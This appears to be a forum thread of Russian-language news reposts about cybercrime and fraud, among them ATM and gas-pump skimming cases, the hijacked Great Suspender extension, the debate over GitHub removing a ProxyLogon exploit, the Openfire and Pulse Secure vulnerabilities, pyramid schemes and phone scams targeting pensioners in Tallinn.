На этом фоне государство продолжает выделять все большие суммы на поддержание своих социальных программ. Например, в рамках программы SNAP в 2020 году было выделено 74 миллиарда долларов, а в 2022 году показатель достиг 113 миллиардов долларов. По мнению Хейвуда Тэлкоува (Haywood Talcove), генерального директора компании LexisNexis Risk Solutions, которая в том числе предоставляет государству статистику в части управления рисками, это увеличение расходов не сопровождалось повышением мер безопасности и защиты от мошенников. Результатом стало то, что различные группировки завладели по меньшей мере 163 миллиардами долларов.
«И проблема никуда не исчезнет, — прогнозирует Тэлкоув. — Более того, все будет еще хуже».
Эксперты отмечают, что кардеры и мошенники используют для достижения своих целей скиммеры, фишинг, а также различные утечки персональных данных американцев. При этом они расходятся во мнении о том, какой из этих факторов оказывает большее влияние на экономику мошенничества с пособиями. На этом фоне рекомендации государства по-прежнему сводятся к регулярной смене пин-кодов, совершению покупок исключительно в крупных магазинах, а также отказу от телефонных разговоров с незнакомыми людьми.
source: thebaltimorebanner.com/politics-power/national-politics/snap-benefits- stolen-telegram-XZWBQARNKFG4NHQAH6JUQRRGBU
Из Chrome Web Store удалили расширение The Great Suspender, которое приостанавливало неиспользуемые вкладки в браузере и принудительно выгружало их ресурсы, чтобы освободить память. Этот простой инструмент пользовался огромной популярность и был установлен более 2 000 000 раз.

Как рассказывает издание Bleeping Computer, еще летом 2020 года разработчик The Great Suspender продал свое детище неизвестной организации, так как у него самого не было времени на поддержание проекта. Еще тогда у многих возникли подозрения в отношении покупателей, ведь кто-то заплатил деньги за бесплатное опенсорсное расширение, которое не приносило прибыли разработчику. Дело в том, что в прошлом подобные сделки не раз приводили к тому, что новые владельцы начинали шпионить за пользователями или внедряли рекламу в их браузеры.
К сожалению, в этот раз история, похоже, развивается по похожему сценарию. Так, еще в октябре 2020 года новые хозяева The Great Suspender обновил расширение до версии 7.1.8, в состав которой были включены скрипты, отслеживающие поведение пользователей и выполнявшие произвольный код, полученный с удаленного сервера. Эти подозрительные изменения быстро заметили специалисты Microsoft, после чего расширение удалили из Microsoft Edge Store, а затем вышла новая версия 7.1.9, уже без малвари.
Что произошло теперь остается только догадываться, так как на прошлой неделе Google попросту объявила The Great Suspender вредоносным без объяснения причин. Неясно, обнаружили ли специалисты Google дополнительные вредоносные скрипты к коде или запоздало отреагировали на случившееся ранее и опасения сообщества.
Возможно, некоторых пользователей утешит тот факт, что на GitHub по-прежнему можно найти версию 7.1.6 (последний релиз настоящего разработчика The Great Suspender, не содержащий вредоносных скриптов).
Источник: xakep.ru/2021/02/08/the-great-suspender/
Вчера мы писали о том, что независимый ИБ-исследователь из Вьетнама опубликовал на GitHub первый настоящий PoC-эксплоит для серьезного комплекса уязвимостей ProxyLogon, недавно обнаруженных в Microsoft Exchange. Работоспособность этого эксплоита подтвердили известные эксперты, включая Маркуса Хатчинса из Kryptos Logic, Дэниела Карда из PwnDefend и Джона Уэтингтона из Condition Black.
При этом многие отмечали, что публичный релиз PoC-эксплоита сейчас – это крайне сомнительный шаг. К примру, совсем недавно компанию Praetorian подвергли жесткой критике за куда меньший «проступок»: ее специалисты лишь обнародовали подробный обзор уязвимостей ProxyLogin, хотя воздержалась от выпуска собственного эксплоита.
Дело в том, что в настоящее время по меньшей мере десять хак-групп эксплуатируют ошибки ProxyLogon для установки бэкдоров на серверы Exchange по всему миру. По разным оценкам, количество пострадавших компаний и организаций уже достигло 30 000-100 000, и их число постоянно продолжает расти, равно как и количество атакующих.
Учитывая всю серьезность ситуации, уже через несколько часов после публикации эксплоита тот был удален с GitHub администрацией сервиса. Из-за этого некоторые участники ИБ-сообщества пришли в ярость и немедленно обвинили Microsoft в цензуре контента, представляющего жизненный интерес для специалистов по безопасности со всего мира.
Так, многие исследователи говорят, что GitHub придерживается двойных стандартов, которые позволяют компании использовать PoC-эксплоиты для исправления уязвимостей, влияющих на ПО других компаний, но при этом аналогичные PoC для продуктов Microsoft удаляются.
«Ух ты. У меня нет слов. Microsoft действительно удалила PoC-код с GitHub. Это чудовищно, удалить с GitHub код ИБ-исследователя, направленный на их собственный продукт, который уже получил патчи», — пишет в Twitter Дэйв Кеннеди, основатель компании TrustedSec.
Click to expand...
В той же социальной сети эксперт Google Project Zero Тэвис Орманди спорит с Маркусом Хатчинсом. Последний говорит, что не совсем понимает, какую пользу могла принести хоть кому-то публикация работающего RCE-эксплоита, на что Орманди отвечает:
«Есть ли польза от Metasploit, или буквально все, кто его используют — скрипткидди? К сожалению, невозможно поделиться исследованиями и инструментами с профессионалами, не поделившись ими еще и со злоумышленниками, но многие люди (например, я) считают, что преимущества перевешивают риски».
Click to expand...
В свою очередь Хатчинс пишет, что аргумент об уже исправленных уязвимостях несостоятелен, так как около 50 000 серверов по всему миру по-прежнему уязвимы.
«”Уже вышли патчи”. Чувак, есть более 50 000 непропатченных серверов Exchange. Выпуск полностью готовой к работе цепочки RCE — это не исследование безопасности, это безрассудство и глупость.
Я и раньше видел, как GitHub удаляет вредоносный код, и не только код, нацеленный на продукты Microsoft. Очень сомневаюсь, что MS сыграла какую-то роль в этом удалении, [эксплоит] просто нарушал политику GitHub в отношении активного вредоносное ПО или эксплоитов, ведь он появился совсем недавно, а над огромным количеством серверов нависла угроза атак вымогателей», — говорит Хатчинс.Click to expand...
Представители GitHub сообщили журналистам, что эксплоит, конечно, имел образовательную и исследовательскую ценность для сообщества, однако компания вынуждена поддерживать баланс и помнить о необходимости сохранения безопасности более широкой экосистемы. Поэтому, в соответствии с правилами сервиса, эксплоит для недавно обнаруженной уязвимости, которая прямо сейчас активно используется для атак, все же был удален из открытого доступа.
Источник: xakep.ru/2021/03/12/proxylogon-poc-deleted/
Компания Veracode [опубликовала](https://www.veracode.com/blog/research/announcing-state- software-security-v11-open-source-edition) результаты [исследования](https://info.veracode.com/fy22-state-of-software- security-v11-open-source-edition.html) проблем с безопасностью, вызванных встраиванием открытых библиотек в приложения (вместо динамического связывания многие компании просто копируют в состав своих проектов нужные библиотеки). В результате сканирования 86 тысяч репозиториев и опроса около двух тысяч разработчиков определено, что 79% перенесённых в код проектов сторонних библиотек в последующем никогда не обновляются.
При этом устаревший код библиотек становится причиной проблем с безопасностью, которых в 92% случаев можно избежать простым обновлением кода библиотеки. Отговорки, что обновление библиотек не производится из-за возможного нарушения совместимости, в большинстве случаев беспочвенны, так как в 69% случаев уязвимости были устранены в корректирующих выпусках, не связанных с изменением функциональности.
Влияние также оказывает информирование разработчиков о появлении уязвимостей - в случае, если разработчики были уведомлены о проблеме в библиотеке, в 17% случаев проблема решалась в течение часа, а в 25% - одной недели. При наличии информации о том, как уязвимость в библиотеке может привести к компрометации приложения, в 50% случаев исправление выпускалось в течение трёх недель, а без предоставления сведений - устранения уязвимости приходилось ждать 7 и более месяцев. Четверть опрошенных разработчиков заявили, что при выборе библиотеки для встраивания основное внимание уделяется функциональности и лицензии на код, а уже потом учитывается безопасность.
Примечательно, что с проверкой лицензий на код ситуация не лучше - 54% опрошенных признались, что не всегда проверяют лицензию на код библиотеки перед её интеграцией в свой продукт. Обязательную проверку лицензионной совместимости практикуют только 27% опрошенных.
Пресс-релиз федеральной прокуратуры Восточного округа штата Пенсильвания о приговоре 43-летнему выходцу из Армении Вержу Мовсисяну.
Проживающий в лос-анджелесском пригороде Глендейл, 40% населения которого составляют армяне, Верж Мовсесян был арестован в июне 2019 года вместе с Гамлетом Тантушяном, Арменом Сахакяном, Давидом Далдумяном, Хрчией Гулумяном и Гевушем Габриэляном – все из Калифорнии, а также примкнувшим к ним Романом Гридуско из Филадельфии.
В июне 2020 года Мовсесян признал себя виновным в банковском мошенничестве, похищении личных данных и отмывании денег, и 28 июля этого года судья Пол Дайамонд в Филадельфии приговорил его к 75 месяцам лишения свободы, пяти годам надзора после освобождения и выплате 599 тыс. долларов в счет погашения ущерба.
Трое его земляков-подельников тоже признали себя виновными, и одного судья Дайамонд в марте этого года приговорил к лишению свободы на срок больше трех лет, а двое ждут приговоров в августе и сентябре. Остальные трое пока держатся, и суд присяжных назначен на сентябрь. 68-летнего судью Пола Дайамонда назначил в 2004 году президент Буш-младший, и Сенат единогласно одобрил это назначение.
Суть предъявленных всей группе обвинений состояла в том, что они пользовались украденными данными дебитных карт и через банкоматы снимали и со счетов владельцев этих карт деньги, которые затем отмывали.
Данные дебитных карт похищались с помощью скимминга – одного из популярных видов устройств современного мошенничества с банковскими картами. Скимминг (от английского глагола «to skim» – «скользить») заключаются в том, что в банкоматах (чаще всего уличных) устанавливаются скрытые устройства, позволяющие считывать информацию с платежных карт в процессе транзакции. Получив такие данные, кибермошенники создают дубликат карты с записанным на магнитной ленте PIN-кодом. Чаще всего прикрепляют скиммер к панели банкомата. Раскрывая тайны этой кухни, могу добавить, что в компоненты скиммера входят: а) магнитная головка для считывания и копирования закрытых данных с ленты банковской карты; б) миниатюрный преобразователь, который превращает данные в цифровой код; в) накопитель, производящий запись кода на носитель информации; г) скрытая видеокамера, которая фиксирует набор PIN-кода в процессе транзакции, и д) иногда накладная клавиатура панели банкомата, которую устанавливают поверх оригинальной. Для непосвящённых это звучит угрожающе непонятно, но для среднестатистического айтишника – проще пареной репы.
В обвинении, из которого затем выделяли одного за другим признавших себя виновными, утверждалось, что все семеро заработали на скимминге больше 250 тыс. долларов, а началось все с того, что в 2016 году такое устройство обнаружили в насосе заправки Sainath Food & Fuel на Саут-колледж авеню в Ньюарке. Началось пока еще не федеральное расследование, и полиция за последовавшие месяцы установила, что такие аферы творится по всему региону.
К расследованию подключились агенты ФБР, Секретной службы и Следственного отдела федеральной почты. Одного из подсудимых задержали в Пенсильвании, обнаружив у него 5800 долларов наличными и 40 поддельных кредитных карт с перекачанной туда информацией. Задержанный быстро сориентировался, согласился стать тайным осведомителем и, как выразился Михаил Горбачев о советской перестройке, процесс пошел.
В данном случае скиммеры устанавливались не на банкоматах, а на автоматических насосах бензозаправок, которые по кредитным и дебитным картам наполняют баки машин. Мошенники работали по всему Северо-востоку страны в «атлантических» штатах Нью-Йорк, Нью-Джерси, Пенсильвания, Делавэр и Мэриленд. «Эта афера использовала почти неуязвимую технологию, делая потерпевшими людей, которые занимались каждодневными делами, – заявила в пресс-релизе временный прокурор Восточного округа штата Пенсильвания Дженнифер Уильямс. – Стать жертвой в таких случаях очень тревожно, поскольку жертва ничего не может сделать, чтобы этого не произошло. Хочу поблагодарить агентов и следователей, которые безустанно работали, чтобы раскрыть эту аферу и помочь нашей прокуратуре добиться торжества права для потерпевших». В том же духе высказался Майкл Дрисколл, начальник отделения ФБР в Филадельфии. Он назвал скимминг «коварным преступлением, когда злоумышленники пользовались людьми, занимавшимися своими обычными делами и даже не представлявшими, что наполнить бензобак машины – значит опустошить свой счет в банке».
Житель американского Миннеаполиса (штат Миннесота), укравший с помощью поддельных документов деньги 250 человек, приговорен местным судом к пяти годам тюремного заключения. 37-летний Томас Стойка (Thomas Stoyka) сумел провернуть такое мошенничество с помощью подельницы — 34-летней Эмили Герст (Emily Gerst), которая до сих пор находится в бегах.
Стойка и Герст обвинялись в том, что с помощью фальшивых документов открывали банковские счета и кредиты через магазины и различные онлайн-приложения. При этом общая сумма причиненного ими ущерба так и осталась неизвестной из-за очень солидного размаха мошенничества. Суд смог обязать Стойку лишь к выплате тысячи долларов каждой из жертв в качестве компенсации за кражу их персональных данных. Однако и эти деньги он, согласно мнению местной полиции, выплатить не сможет, так как у него будет слишком маленькая зарплата в тюрьме, а его накопления обнаружить в ходе расследования не удалось.
Известно, что как минимум у одной из жертв была украдена относительно солидная сумма — 12 тысяч долларов. Что любопытно, ей стала член городского совета Миннеаполиса Линеа Пальмисано (Linea Palmisano). Несмотря на решение суда, ее кредит остается замороженным спустя 16 месяцев после аферы Стойки и Герст, которые вывели деньги несколькими траншами за 10 дней.
Именно сюжетная линия Пальмисано в итоге погубила мошенников. Герст открывала кредитную линию на имя члена совета в магазине Richfield в декабре 2021 года. Однако местному служащему показалось странным сочетание внешности Герст и фамилии Пальмисано, о чем он рассказал местной полиции. В итоге следователю удалось физически встретиться с двумя мошенниками, но тогда Стойка сбежал, а Герст отказалась от беседы под предлогом недостаточной доказательной базы.
Впоследствии силовики обнаружили штаб-квартиру мошенников, под которую было оборудовано взятое в аренду складское помещение. Там были изъяты парики, принтеры, ноутбуки, незаполненные чеки, отмычки, ключи, государственные печати и другие предметы. В итоге Стойка и Герст были арестованы, женщины предстала перед судом еще в сентябре, и ей грозил условный срок, однако на последующие заседания она не явилась.
Специалист попал в ловушку Modern Solution и стал козлом отпущения.
В Германии IT-консультант был оштрафован на €3 000 за обнаружение и сообщение об уязвимости базы данных интернет-магазина, которая раскрыла данные почти 700 000 клиентов.
В июне 2021 года специалист, известный как Хендрик Х., работая над устранением неполадок в программном обеспечении для клиента IT-компании Modern Solution GmbH, обнаружил, что код Modern Solution использует подключение MySQL к серверу баз данных MariaDB. Пароль для доступа к серверу был сохранён в открытом виде в исполняемом файле MSConnect.exe, что позволяло любому пользователю с помощью простого текстового редактора увидеть незашифрованные учетные данные.
Пароль открывал доступ ко всей информации около 700 000 клиентов различных интернет-магазинов. Клиенты совершали покупки у мелких продавцов, использующих программное обеспечение Modern Solution для работы на крупных онлайн- платформах, таких как Otto, Kaufland или Check24. Программные файлы Modern Solution были свободно доступны в Интернете, что позволяло любому пользователю найти пароли к базам данных в исходных кодах.
Извлечение данных о конечных потребителях розничных продавцов
Modern Solution выпустила заявление, в котором говорилось о наличии уязвимости в их системе, позволявшей получить доступ к базе данных и незашифрованным паролям и личным данным. По словам компании, были раскрыты чувствительные данные клиентов Modern Solution: фамилии, имена, адреса электронной почты, телефонные номера, банковские реквизиты, пароли, а также история переписок и звонков. Также указывается, что был раскрыт ограниченный объем данных – имена и адреса – покупателей, совершивших покупки у розничных клиентов компании.
В сентябре 2021 года полиция Германии конфисковала компьютеры IT-консультанта после жалобы от Modern Solution. Высокопоставленные сотрудники компании утверждали, что программист ранее работал в компании JTL, производящей системы, с которыми взаимодействует ПО Modern Solution. Отношения с JTL были прекращены из-за конфликтов. Представители Modern Solution заявили полиции, что доступ к паролям был получен благодаря знаниям, полученным в JTL.
Хендрику Х. было предъявлено обвинение в незаконном доступе к данным по статье 202a Уголовного кодекса Германии на основании правила, согласно которому изучение данных, защищенных паролем, может классифицироваться как преступление.
В июне 2023 года окружной суд встал на сторону IT-консультанта, поскольку программное обеспечение Modern Solution было недостаточно защищено. Однако апелляционный суд отправил дело на новое рассмотрение. 17 января окружной суд оштрафовал Хендрика Х. и обязал его оплатить судебные издержки. Программист заявил, что его целью была защита клиентов. Приговор еще не имеет юридической силы, поскольку у обеих сторон есть неделя на подачу апелляции, что и намерен сделать Хендрик Х.
Марк Штайер, блогер и специалист по электронной коммерции, который обнародовал информацию об уязвимости, назвал решение суда «шокирующим», поскольку пароль, сохраненный почти в открытом виде, не может считаться «особым обеспечением безопасности». Он отметил, что в таком случае должен был быть привлечен эксперт, но этого не произошло. Также Штайер заявил, что Modern Solution преуменьшила масштабы утечки данных.
Исследователь безопасности Владимир Палант выразил недовольство решением суда, отметив, что такое решение создает угрозу для законной исследовательской деятельности, позволяя компаниям уклоняться от обеспечения адекватной безопасности и в конечном итоге подвергая опасности пользователей.
Ботнет Brutus бьет по удаленному доступу
Ботнет Brutus проводит массовые атаки методом подбора паролей на VPN-продукты
разных вендоров. Злоумышленники пытаются взломать учетные записи для получения
удаленного доступа.
Brutus использует около 20 000 IP-адресов по всему миру, постоянно меняя
их. Это помогает ботнету избегать обнаружения системами безопасности и
блокировки.
Среди целей ботнета — VPN-решения Cisco, Fortinet, Palo Alto, SonicWall и веб-
приложения с авторизацией через Active Directory. Атаки угрожают корпоративной
инфраструктуре и удаленному доступу сотрудников.
Несмотря на выпущенные обновления безопасности, тысячи серверов Openfire подвержены активно эксплуатируемой критической уязвимости CVE-2023-32315 (CVSS: 7.5).
Openfire — это популярный открытый чат-сервер (XMPP), основанный на Java и скачанный более 9 млн. раз. Уязвимость позволяет неавторизованному злоумышленнику создавать новые учетные записи администратора и загружать вредоносные плагины.
В мае 2023 года было обнаружено, что версии Openfire, начиная с 3.10.0 (апрель 2015 года), подвержены уязвимости обхода аутентификации . Разработчики выпустили несколько обновлений безопасности (версии 4.6.8, 4.7.5 и 4.8.0). Тем не менее, в июне уже появились сообщения о том, что уязвимость активно эксплуатируется на не обновлённых серверах. Компания VulnCheck отметила , что множество администраторов серверов не торопятся устанавливать обновления. По данным VulnCheck, около 3000 серверов все еще остаются уязвимыми. На данный момент существует 6324 сервера Openfire с открытым доступом к интернету, из которых половина (3162 сервера) все еще подвергаются риску заражения из-за использования устаревших версий программного обеспечения.
Кроме того, отчет VulnCheck выявил новый, более скрытный метод эксплуатации уязвимости. В отличие от существующих методов, которые легко обнаруживаются в журналах аудита, новый метод позволяет злоумышленникам загружать вредоносные плагины, минуя процесс создания учетной записи администратора, что делает атаку менее заметной. Уязвимость уже активно эксплуатируется в реальных условиях (In The Wild, ITW), в том числе для установки криптомайнера Kinsing. Появление нового метода эксплуатации может вызвать вторую волну атак, которая будет еще более мощной и опасной.
Администраторам серверов Openfire настоятельно рекомендуется как можно скорее обновить системы до защищенных версий, чтобы предотвратить возможные кибератаки и утечку конфиденциальной информации.
Российский сенатор Артем Шейкин призвал Роскомнадзор и Генеральную прокуратуру страны проверить работу сервиса Eye of God («Глаз Бога»). Как сообщает ТАСС, чиновника смутила платная опция записи телефонных разговор россиян без их ведома. При этом в случае подтверждения этой информации, Шейкин предлагает заблокировать сервис пробива.
«В
настоящее время вызывают большие опасения факты мошенничества с использованием
биометрических данных и механизмов искусственного интеллекта. Одним из
сервисов, имеющих широкое распространение на территории России, является Eye
of God, который предоставляет услугу, позволяющую записывать телефонный
разговор за определенную плату», — приводит агентство позицию Шейкина, который
также является заместителем председателя Совета по развитию цифровой экономики
при Совете Федерации.
Шейкин констатировал в своем обращении, что сам факт записи голоса противоречит законодательству России, гарантирующему защиту и неприкосновенность персональных и биометрических данных. Полученные образцы голоса, по мнению сенатора, могут в дальнейшем использоваться для совершения противоправных или откровенно преступных деяний. Наибольшее опасение у Шейкина вызывает тот факт, что эти преступления могут быть направлены против наименее защищенных и технически подкованных слоев россиян, в том числе пенсионеров.
«Прошу
организовать проведение прокурорской проверки и при подтверждении информации о
фактах нарушения законодательства РФ принять меры прокурорского реагирования»,
— констатировал Шейкин в заявлении на имя генпрокурора.
Стоит отметить, что сервис популярен не только среди даркнет-предпринимателей или OSINT-специалистов, но и среди сотрудников различных правоохранительных структур. Благодаря использованию «Глаза Бога» многие из них имеют возможность получения закрытой информации без соблюдения бюрократических процедур, распространенных в МВД и ФСБ. Об этом Шейкин в своем заявлении ничего не написал.
Сотрудники Управления правоприменения Индии (ED) изъяли у причастных к работе пирамиды криптовалюты, фиатные деньги и недвижимость на общую сумму 36 724 752 рупий ($4.97 миллиона).
Борцы с финансовыми преступлениями изъяли ценности во время обыска у обвиненного в организации криптовалютной пирамиды Morris Coin: доктора медицины Нишада К (Nishad K) и его партнеров в индийских штатах Керала, Карнатака, Тамилнаду и Нью-Дели. Фиатные деньги находятся на нескольких банковских счетах Нишада К и его юрлиц, криптовалюты – разными суммами в BTC, ETH, BNB, YFI, VET, ADA, USDT.
ED инициировало расследование по делу об отмывании денег в 2020 году. По данным ведомства, отмывание шло через три компании: Long Reach Global, Long Reach Technologies и Morris Trading Solutions. От имени этих юрлиц Нишад К и его партнёры продвигали криптовалюту Morris Coin. Минимальная сумма вложений составляла 15 000 индийский рупий.
Из-за Morris Coin пострадали более 900 инвесторов. Обманутым вкладчикам обещали ежедневную прибыль в размере 270 рупий в течение 300 дней. По окончании 300-дневного периода организаторы пирамиды гарантировали дополнительную награду в 10 токенов Morris. За привлечение новых рефералов инвесторам полагалось 10-40% от вознаграждения новичков. Полученные от инвесторов деньги организаторы пирамиды использовали для приобретения недвижимости, автомобилей и криптовалют.
В конце прошлого года комиссар индийской полиции Шикха Гоэль (Shikha Goel) сообщила в Twitter о методах, которые используют создатели пирамид для обмана инвесторов. В мае ED обвинило биржу WazirX в проведении незаконных транзакций с криптоактивами и отмывании денег, начав расследование деятельности платформы.
В период карантина объем безналичных расчетов в Украине заметно вырос, чем незамедлительно воспользовались мошенники.
В 2020-м в Украине было зафиксировано 101 000 случаев мошенничества с банковскими картами, тогда как годом ранее подобных эпизодов правоохранители зарегистрировали 72 000.
По данным НБУ, в прошлом году мошенники активно «проворачивали» операции с банковскими картами в интернете и прибегали к методам социальной инженерии, а также использовали банкоматы и терминалы.
Так, используя банкоматы, преступники практиковали снятие наличных с применением «белого» пластика, держателя карты без ее физического получения (Cash Trapping) и скимминговых инструментов, таких как копирование данных платежных карт запись ПИН-кода и так далее.
Плюс мошенники снимали деньги жертв с использованием банкомата без отражения операций на счете и осуществляли физические атаки на банкоматы.
В интернете преступники прибегали к вирусным атакам и использованию поддельных сайтов, а также занимались продажей и передачей информации о скомпрометированных данных.
В терминальной сети, по данным НБУ, мошенники устанавливали вредоносные программы, использовали скиммеры, позволяющие считывать и передавать данные платежной карты при осуществлении расчета, и получали наличные через кассу банка по поддельным документам.
Также преступники проводили несанкционированное/неточное списание и операции с использованием поддельных, похищенных или потерянных карт. Плюс в числе мошенничеств упоминается компрометация кассиром данных платежной карты при расчетах с целью их дальнейшего несанкционированного использования и проведение дублирующих операций кассиром/оператором.
Часто в 2020-м практиковалось мошенничество в системах дистанционного обслуживания и «обкатывались» методы социальной инженерии, когда мошенники выманивали у жертв их персональные данные и реквизиты карт, а также побуждали владельцев счетов к переводу средств в свою пользу.
67-летний житель Таллинна потерял 80 302 евро из-за инвестиционных мошенников. Учитывая, что средняя пенсия по стране составляет 544 евро, эта сумма насчитывает в себе пенсию за 12 лет и четыре месяца.
Пенсионер лишился денег в ходе мошеннической схемы, которая уже широко распространена среди преступников. Мужчина увидел рекламу в YouTube, которая посоветовала портал для инвестиций unixbroker.com, где нужно было оставить свои контактные данные для создания аккаунта.
Вскоре с пенсионером связался маклер, который помог создать аккаунт на портале и оставил у жертвы неверное впечатление о реальных условиях портала. В качестве первого взноса пенсионер перевел на счет сайта 206 евро.
Вместе с переводом денег он дал маклеру доступ к своему компьютеру и телефону, скачав на них программу удаленного доступа AnyDesk. После этого мошенники создали на его имя несколько криптовалютных кошельков и сделали с банковских счетов пенсионера под разными предлогами переводы на 80 302 евро.
В один момент жертва поняла, что несмотря на обещания маклеров, уже невозможно снять деньги, переведенные на различные счета, не говоря уже об обещанном доходе по интрессам. Кроме того, маклеры под разными предлогами требовали дополнительные денежные переводы.
В итоге пенсионер обратился в полицию, которая начала расследование. Общий ущерб составил 80 508 евро.
сюда же
В Таллинне в начале апреля 84-летняя женщина посмотрела передачу „Quantum system,” ведущий которой Евгений рассказал, что он и его компания зарабатывают на финансовых рынках и его команда расширяется. Позже женщине с неизвестного номера позвонил мужчина, представившийся Николаем, подчиненным Евгения, и сообщил, что ищет в свою инвестиционную команду нового члена. Женщина согласилась с предложением. В течение апреля при помощи программу AnyConnect со счета женщины сделали пять переводов в сумме 25 549 евро
17 мая 65-летней жительнице Таллинна позвонили якобы из Swedbank и сообщили, что ее счет сейчас заблокируется и деньги могут пропасть, если она сейчас же не зайдет в свой интернет-банк. Женщина испугалась и последовала инструкциям мнимого сотрудника банка, после чего со счета исчезло 800 евро. 18 мая начали уголовные делопроизводства о мошенничестве по такой же схеме, пострадал 61-летний нарвитянин, который после введения ПИН-кодов Smart-ID лишился 5000 евро, а в житель Кохтла-Ярве 830 евро.
13 мая 60-летней женщине позвонили на Viber "из Swedbank" с легендой о попытке кражи денег. Женщина ввела под предлогом установили "защитной программы" ПИН- коды и с ее счета сняли 9742 евро. Еще одной жительнице Таллинне также позвонили на Viber "из Swedbank" с такой же легендой. У женщины спросили признак пользователя интернет-банка, но она его не помнила. Ее попросили установить на телефон программу QuickSupport, помогли зайти в банк, попросили ввести ПИН-коды и сняли 424 евро.
17 мая начато делопроизводство о мошенничестве, когда неизвестных зашел на аккаунты 36-летнего мужчины в Google, Bitpanda и crypto.com и совершил со счета в Bitpanda незаконную сделку в сумме 11 049 евро.
5 мая позвонили 39-летнему мужчине и сообщили, что на его имя открыт счет, где есть деньги, которые можно снять. Для этого на телефон надо было установить программу и заплатить 2000 евро. Позже мужчина обнаружил, что не его имя взяли также кредиты на 1300 и 6500 евро.
"Как правило, предложения, которые кажется слишком хорошими, что быть правдой, никогда правдой не оказываются. Иногда люди не консультируются с близкими по таким вопросам, так как мошенники говорят им, что нет времени на раздумья, поторапливают с решением. Иногда люди скрывают эти сделки от близких по разным причинам. В таком случае независимым и незаинтересованным консультантом может выступить полиция. До того, как соглашаться на какие-либо инвестиции или принимать деньги "в дар", свяжитесь с полицией, веб-констеблями или участковым", — говорит веб-констебль Яна Фролова.
FireEye утверждает, что сразу две хак-группы используют уязвимость нулевого дня в Pulse Secure VPN для атак на сети американских оборонных подрядчиков и правительственных организаций по всему миру.
Специалисты обнаружили атаки в начале текущего года, и разработчики Pulse Secure VPN уже подтвердили заявления исследователей. По данным FireEye, взломы начались еще в августе 2020 года, когда первая хак-группа, которую компания отслеживает как UNC2630, нацелилась на оборонных подрядчиков США и европейские организации.
Тогда хакеры использовали комбинацию старых багов в Pulse Secure VPN, а также новую 0-day уязвимость (CVE-2021-22893), чтобы захватывать контроль над устройствами Pulse Secure, а затем устанавливать на них малварь SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE или PULSECHECK. Эти вредоносы действовали как веб-шеллы и бэкдоры в сети взломанной организации.
В октябре 2020 года к атакам присоединилась вторая группа хакеров, которой FireEye присвоила идентификатор UNC2717. Эта группировка тоже применяла аналогичные методы и 0-day баг для установки на устройства собственного набора малвари (HARDPULSE, QUIETPULSE и PULSEJUMP). От атак вторых злоумышленников страдали сети государственных учреждений в Европе и США.
Хотя FireEye не могла связать две эти группировки и кампании, специалисты отмечают, что «возможно, одна или несколько связанных групп несут ответственность за разработку и распространение различных инструментов среди слабо связанных друг с другом APT».
По информации экспертов, атаки продолжались до марта 2021 года. За время расследования аналитикам удалось обнаружить еще два дополнительных образца малвари (таким образом, общее количество вредоносов достигло 12), которые так же использовались для взлома, но компания не смогла однозначно связать эти образцы с конкретной группой атакующих.
Хотя у FireEye нет почти никакой информации о второй хак-группе, судя по внутренним данным исследователей, первая группа UNC2630, похоже, «действует от имени правительства Китая и может иметь связи с APT5», то есть известной китайской кибершпионской группировкой.
Разработчики Pulse Secure VPN уже выпустили бюллетень безопасности, посвященный проблеме CVE-2021-22893. В документе можно найти рекомендации и временные меры по предотвращению атак, так как полноценный патч для этой проблемы будет доступен только в мае. Также компания представила инструмент Pulse Security Integrity Checker Tool, который предназначен для сканирования серверов Pulse Secure VPN в поисках признаков взлома, эксплуатации CVE-2021-22893 и других известных уязвимостей.
Источник: xakep.ru/2021/04/21/pulse-secure-vpn-0day/
В федеральном суде Восточного округа штата Калифорния в Сакраменто приговорили
к 324 месяцам, то есть 27 годам лишения свободы 41-летнего иммигранта из
бывшего СССР Руслана Кирилюка.
Проживающий в калифорнийском городке Беверли-Хиллс, который фактически входит
в Лос-Анджелес, Кирилюк был арестован 5 сентября 2015 года, обвинен в
банковском мошенничестве, и в конце февраля 2019 года после четырех дней
судебных слушаний и непродолжительного совещания присяжные признали его
виновным по всем 24 пунктам обвинения. В приговоре, который 6 декабря вынес
судья Гарланд Беррел, отмечалось, что Кирилюк с сообщниками создали 71
подставную компанию, через которые с октября 2011 по март 2014 года
“прокрутили” 119 тыс. похищенных номеров кредитных карт American Express, в
итоге обокрав этот банк больше чем на 3,4 млн долларов.
После ареста Кирилюк был освобожден под залог в 25 тыс. долларов, что редкость для такого приговора, но это объяснимо. Залог заплатила его сестра Алиса, и суд был назначен на 7 февраля 2017 года, но накануне адвокат Кирилюка сообщил в прокуратуру, что Руслан уже неделю как не дает знать о себе. Суд отложили, поисками Кирилюка занялось отделение ФБР в Сакраменто, его объявили в розыск, и 21 марта 2017 года следователь ФБР Нассон Уокер получил у судьи-магистрата Деборы Барнс ордер на его арест. Арестовали Кирилюка в декабре 2017 года, и по федеральному Уложению о наказаниях (Federal Sentencing Guidelines) ему грозило по 20 лет тюрьмы и по 250 тыс. долларов штрафа за каждый пункт мошенничества, плюс 2 года за кражу личных данных, а также до 10 лет лишения свободы и такой же штраф за неявку в суд. В итоге приговор был вынесен не обычным поглощением наказаний, а частичным сложением на предусмотренное законом “усмотрение судьи с учетом различных факторов”.
Вместе с Русланом Кирилюком по делу проходят проживающие в Сакраменто 39-летний Михран Мелконян и 38-летний Александр Маслов, а также 45-летний Руслан Ахмеров из района Студио-Сити в Лос-Анджелесе. Мелконян полностью признал себя виновным 15 февраля 2017 года и 4 января 2019 был приговорен к 230 месяцам (19 годам и 2 месяцам) лишения свободы, которые сейчас отбывает в федеральной тюрьме городка Ломпок в Калифорнии. Ахмеров 15 декабря 2014 года признал вину в одном эпизоде мошенничества и должен быть приговорен 13 декабря 2019 года, то есть в день выхода этого номера “Русской Рекламы”. В базе данных федерального бюро тюрем значится, что он был освобожден 6 марта 2014 года, то есть по предыдущей судимости за мошенничество, в котором он признал себя виновным в декабре 2014 года.
Руслана Кирилюка в этой базе данных вообще нет. В его деле указано, что 19 декабря 2017 года Руслан Кирилюк был арестован вторично и 23 января 2019 года ему отказали во временном освобождении для участия в похоронах. Александра Маслова среди заключенных федеральных тюрем тоже нет. Его арестовали вместе с остальными в 2015 году, вскоре освободили под залог и направили на психиатрическое обследование. В ноябре 2017 года суд признал его вменяемым, то есть способным участвовать в слушаниях дела о мошенничестве. Сейчас он ждет суда, ориентировочно назначенного на 31 января 2020 года.
